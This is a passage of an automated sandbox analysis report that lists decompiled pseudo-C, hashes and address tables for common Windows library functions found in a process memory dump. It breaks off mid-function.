              • Instruction ID: 6c9bba922115bdc7031424d6a62f52f86186c7b0b51ee15eca8a2a6f16179de1
              • Opcode Fuzzy Hash: 51cc6620afb8eed454e975985887e1197aec5d3cff1e2ab98f8b1decf4781b2a
              • Instruction Fuzzy Hash: 02613670F00205EBEB25DF68C880B7E77A6EB45714F1406EED851A72E0DB34BA41A791
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C90EA5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
              Download Yara Rule
              C-Code - Quality: 80%
              			E04C90EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E04C8FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E04C91074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E04C09730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E04C8A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E04C8A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x4cb8b04 >> 0x14) + (_v44 -  *0x4cb8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E04BE7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E04C8138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E04BE7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E04C7FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x4cb8724 & 0x00000008) != 0) {
						E04C852F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E04C915B5(0x4cb8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























              0x04c90eb7
              0x04c90eb9
              0x04c90ec0
              0x04c90ec2
              0x04c90ecd
              0x04c9105b
              0x04c9105b
              0x04c91061
              0x04c91066
              0x04c91066
              0x04c9106b
              0x04c91073
              0x04c91073
              0x04c90ed3
              0x04c90ed6
              0x04c90edc
              0x04c90ee0
              0x04c90ee7
              0x04c90ef0
              0x04c90ef5
              0x04c90efa
              0x04c90efc
              0x04c90efd
              0x04c90f03
              0x04c90f04
              0x04c90f06
              0x04c90f07
              0x04c90f09
              0x04c90f0e
              0x04c90f14
              0x04c90f23
              0x04c90f2d
              0x04c90f34
              0x04c90f34
              0x04c90f14
              0x04c90f52
              0x00000000
              0x00000000
              0x04c90f58
              0x04c90f73
              0x04c90f74
              0x04c90f79
              0x04c90f7d
              0x04c90f80
              0x04c90f86
              0x04c90fab
              0x04c90fb5
              0x04c90fc6
              0x04c90fd1
              0x04c90fe3
              0x04c90fd3
              0x04c90fdc
              0x04c90fdc
              0x04c90feb
              0x04c91009
              0x04c91009
              0x04c91015
              0x04c91027
              0x04c91017
              0x04c91020
              0x04c91020
              0x04c9102f
              0x04c9103c
              0x04c9103c
              0x04c91048
              0x04c91050
              0x04c91050
              0x04c91055
              0x00000000
              0x04c91055
              0x04c90f88
              0x04c90f9e
              0x04c90fa2
              0x04c90fa9
              0x00000000
              0x00000000
              0x00000000
              0x04c90fa9
              0x00000000

              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID: `
              • API String ID: 0-2679148245
              • Opcode ID: f637a9d1d2272e14d0fdbee03b54a049f9d5378a24bb8ddc77d8b02002c76ffa
              • Instruction ID: a8c9ede28365ccb0ffbe8f731378d988ebae7ff36d1f867e1a24805ce27dca8c
              • Opcode Fuzzy Hash: f637a9d1d2272e14d0fdbee03b54a049f9d5378a24bb8ddc77d8b02002c76ffa
              • Instruction Fuzzy Hash: AB519E71204342AFE724DF29D889B1BB7E6EBC4708F08492DF99697290DA71FD05C761
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BFF0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
              Download Yara Rule
              C-Code - Quality: 76%
              			E04BFF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E04BE4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E04C09830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E04C09990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E04C095D0();
							goto L11;
						} else {
							_t18 = _t82 + 0x18; // 0x102bc81a
							_t109 = L04BE4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								_t29 =  &(_t103[2]); // 0x2003102b
								E04C0F3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t34 =  &(_t103[2]); // 0x2003102b
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E04C095D0();
										L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























              0x04bff0d3
              0x04bff0d9
              0x04bff0e0
              0x04bff0e7
              0x04bff0f2
              0x04bff0f4
              0x04bff0f8
              0x04bff100
              0x04bff108
              0x04bff10d
              0x04bff115
              0x04bff116
              0x04bff11f
              0x04bff123
              0x04bff124
              0x04bff12c
              0x04bff130
              0x04bff134
              0x04bff13d
              0x04bff144
              0x04bff14b
              0x04bff152
              0x04c3bab0
              0x04c3bab0
              0x04bff158
              0x04bff158
              0x04bff15a
              0x04bff160
              0x04bff165
              0x04bff166
              0x04bff16f
              0x04bff173
              0x04c3baa7
              0x04c3baa7
              0x04c3baab
              0x00000000
              0x04bff179
              0x04bff179
              0x04bff18d
              0x04bff191
              0x04c3baa2
              0x00000000
              0x04bff197
              0x04bff19b
              0x04bff1a2
              0x04bff1a9
              0x04bff1af
              0x04bff1b2
              0x04bff1b6
              0x04bff1b9
              0x04bff1c0
              0x04bff1c4
              0x04bff1d8
              0x04bff1df
              0x04bff1e3
              0x04bff1e6
              0x04bff1eb
              0x04bff1ee
              0x04bff1f4
              0x04bff20f
              0x04c3bab7
              0x04c3babb
              0x04c3bacc
              0x04c3bad1
              0x04bff215
              0x04bff218
              0x04bff226
              0x04bff22b
              0x00000000
              0x04bff22b
              0x04bff1f6
              0x04bff1f6
              0x04bff1f9
              0x04bff1fb
              0x04bff1fb
              0x04bff1f4
              0x04bff191
              0x04bff173
              0x04bff152
              0x04bff203

              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID: @
              • API String ID: 0-2766056989
              • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
              • Instruction ID: ad5bbf288b8c56d52779855763f0f34f7c132b311021085c720301f74416058c
              • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
              • Instruction Fuzzy Hash: 42517D716047109FD320DF19C840A6BBBF9FF88714F008A2EFA9597690E7B4E954DB91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C43540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
              Download Yara Rule
              C-Code - Quality: 75%
              			E04C43540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x4cbd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E04C00BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E04C43706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E04C0FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E04C43540;
						E04C0FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E04C1DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E04C50C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E04C097C0();
					}
					return E04C0B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E04C43971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E04C43884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E04C0FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E04C09650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E04C43787(_a4,  &_v352, _t80);
						}
					}
					L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E04C095D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































              0x04c43552
              0x04c4355a
              0x04c4355d
              0x04c43566
              0x04c43567
              0x04c4357e
              0x04c4358f
              0x04c435a1
              0x04c435a5
              0x04c4366b
              0x04c4366b
              0x04c4366d
              0x04c43672
              0x04c43679
              0x04c43685
              0x04c4368d
              0x04c4369d
              0x04c436a7
              0x04c436b8
              0x04c436c6
              0x04c436c7
              0x04c436dc
              0x04c436e1
              0x04c436e7
              0x04c436e9
              0x04c436e9
              0x04c43703
              0x04c43703
              0x04c435b5
              0x04c435c0
              0x04c435c4
              0x00000000
              0x00000000
              0x04c435ca
              0x04c435d7
              0x04c435e2
              0x04c435e6
              0x04c435e8
              0x04c435f5
              0x04c435fa
              0x04c43603
              0x04c43604
              0x04c43609
              0x04c4360a
              0x04c43612
              0x04c43613
              0x04c4361e
              0x04c43622
              0x04c43628
              0x04c4362f
              0x04c4362f
              0x04c43636
              0x04c43638
              0x04c4363b
              0x04c43642
              0x04c43642
              0x04c43636
              0x04c43657
              0x04c43657
              0x04c4365c
              0x04c43662
              0x04c43669
              0x00000000
              0x00000000
              0x00000000
              0x00000000

              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID: BinaryHash
              • API String ID: 2994545307-2202222882
              • Opcode ID: fb1f895907102116b8f01731a961a924091e15468ab283bb6b7722bf8b94636d
              • Instruction ID: d1640693ae82dceb0b93ac34888b690e9fdcc39b910b91100b302c8b272e6245
              • Opcode Fuzzy Hash: fb1f895907102116b8f01731a961a924091e15468ab283bb6b7722bf8b94636d
              • Instruction Fuzzy Hash: 594167F1D0056D9FEB21DA50CD84FDEB77DAB84718F0045A5EA09A7290DB30AE88DF94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C43884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
              Download Yara Rule
              C-Code - Quality: 72%
              			E04C43884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E04C09650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L04BE4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E04C09650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















              0x04c43893
              0x04c43896
              0x04c43899
              0x04c4389f
              0x04c438a0
              0x04c438a4
              0x04c438a9
              0x04c438ac
              0x04c438ad
              0x04c438ae
              0x04c438af
              0x04c438b1
              0x04c438b4
              0x04c438bb
              0x04c438bc
              0x04c438bd
              0x04c438c4
              0x04c438c8
              0x04c438ca
              0x04c438ca
              0x04c438d5
              0x04c4393e
              0x04c43940
              0x04c43942
              0x04c43952
              0x04c43954
              0x04c43961
              0x04c43961
              0x04c43967
              0x04c4396e
              0x04c4396e
              0x04c43947
              0x04c4394c
              0x00000000
              0x04c4394c
              0x04c438ea
              0x04c438ee
              0x04c438f8
              0x04c438f9
              0x04c438ff
              0x04c43900
              0x04c43902
              0x04c43903
              0x04c4390b
              0x04c4390f
              0x04c43950
              0x00000000
              0x04c43950
              0x04c43915
              0x04c4391d
              0x04c4391d
              0x04c43922
              0x04c43926
              0x00000000
              0x04c43928
              0x04c4392b
              0x04c4392b
              0x04c43935
              0x04c43937
              0x04c43937
              0x00000000
              0x04c43935
              0x04c43926
              0x04c438f0
              0x00000000

              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID: BinaryName
              • API String ID: 2994545307-215506332
              • Opcode ID: cef61114dce000fb6abeb56b58d208f7307470c345782a18f68e689d8b6c6af6
              • Instruction ID: 795c1e1290ff4bfbd25c4756f48b3646e3640db249d182456fdbc633e8c32c97
              • Opcode Fuzzy Hash: cef61114dce000fb6abeb56b58d208f7307470c345782a18f68e689d8b6c6af6
              • Instruction Fuzzy Hash: EE31F472A00549BFEB25DA99CA45E7BB776EBD0720F014169AC04A76A0D730BE40C7A0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BFD294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
              Download Yara Rule
              C-Code - Quality: 33%
              			E04BFD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x4cbd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E04BE4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E04C0B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E04C098D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E04C095D0();
					L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































              0x04bfd29c
              0x04bfd2a6
              0x04bfd2b1
              0x04bfd2b5
              0x04bfd2b6
              0x04bfd2bc
              0x04bfd2bd
              0x04bfd2be
              0x04bfd2bf
              0x04bfd2c2
              0x04bfd2c4
              0x04bfd2cc
              0x04bfd384
              0x04bfd34b
              0x04bfd34f
              0x04bfd350
              0x04bfd351
              0x04bfd35c
              0x04bfd35c
              0x04bfd2d6
              0x04bfd2da
              0x04bfd2e1
              0x04bfd361
              0x04bfd369
              0x04bfd36d
              0x04bfd2e3
              0x04bfd2e3
              0x04bfd2e3
              0x04bfd2e5
              0x04bfd2ed
              0x04bfd2f5
              0x04bfd2fa
              0x04bfd302
              0x04bfd303
              0x04bfd30b
              0x04bfd30f
              0x04bfd313
              0x04bfd318
              0x04bfd31c
              0x04bfd320
              0x04bfd379
              0x04bfd37d
              0x00000000
              0x00000000
              0x04c3affe
              0x04c3b001
              0x04c3b011
              0x00000000
              0x04bfd322
              0x04bfd322
              0x04bfd330
              0x04bfd337
              0x04bfd35d
              0x04bfd339
              0x04bfd33f
              0x04bfd38c
              0x04bfd38c
              0x04bfd33f
              0x04bfd349
              0x00000000
              0x04bfd349

              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID: @
              • API String ID: 0-2766056989
              • Opcode ID: 75589be06a03f037865fbfbee7f56ebede88e6d89db7dde16a26565668c319b7
              • Instruction ID: fa808d36d034cec5b6ad38042c4f65820e4f2177ba4b2a984686274ca7d87d32
              • Opcode Fuzzy Hash: 75589be06a03f037865fbfbee7f56ebede88e6d89db7dde16a26565668c319b7
              • Instruction Fuzzy Hash: 8C3197B16083059FD711DF19D98096BBBECEBC5754F00056EF69983250E739ED08DB92
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BD1B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
              Download Yara Rule
              C-Code - Quality: 72%
              			E04BD1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E04C0BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E04C0A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E04C0A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L04BE4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









              0x04bd1b8f
              0x04bd1b9a
              0x04bd1b9c
              0x04bd1b9e
              0x04bd1ba3
              0x04c27010
              0x04c27010
              0x00000000
              0x04bd1ba9
              0x04bd1ba9
              0x04bd1bae
              0x00000000
              0x04bd1bc5
              0x04bd1bca
              0x04bd1bcf
              0x04bd1bd0
              0x04bd1bd1
              0x04bd1bd2
              0x04bd1bd6
              0x04bd1bdc
              0x04bd1be0
              0x04c26ffc
              0x04c27000
              0x00000000
              0x04c27006
              0x04c27009
              0x04c27009
              0x04bd1be6
              0x04bd1bec
              0x04bd1c0b
              0x04bd1c0b
              0x04bd1c0c
              0x04bd1c11
              0x04bd1c12
              0x04bd1c15
              0x04bd1c1b
              0x04bd1c1f
              0x04bd1c31
              0x04bd1c33
              0x04c27026
              0x04c27026
              0x04bd1c21
              0x04bd1c24
              0x04bd1c24
              0x04bd1bee
              0x04bd1bee
              0x04bd1bf2
              0x04bd1c3a
              0x04bd1bf4
              0x04bd1bf4
              0x04bd1c05
              0x04bd1c05
              0x04bd1c09
              0x04bd1c3e
              0x00000000
              0x00000000
              0x00000000
              0x04bd1c09
              0x04bd1bec
              0x04bd1be0
              0x04bd1bae
              0x04bd1c2e

              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID: WindowsExcludedProcs
              • API String ID: 0-3583428290
              • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
              • Instruction ID: 18be6bfa07a18217fae853b0d835ef4429cac611734dca3566b160bb0b626b4d
              • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
              • Instruction Fuzzy Hash: 22219576601628ABDB219E9D8980F6BB7AEEF81754F0944E5F9059F200F631FD04A7A0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C78DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
              Download Yara Rule
              C-Code - Quality: 71%
              			E04C78DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x4ca0d50);
				E04C1D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
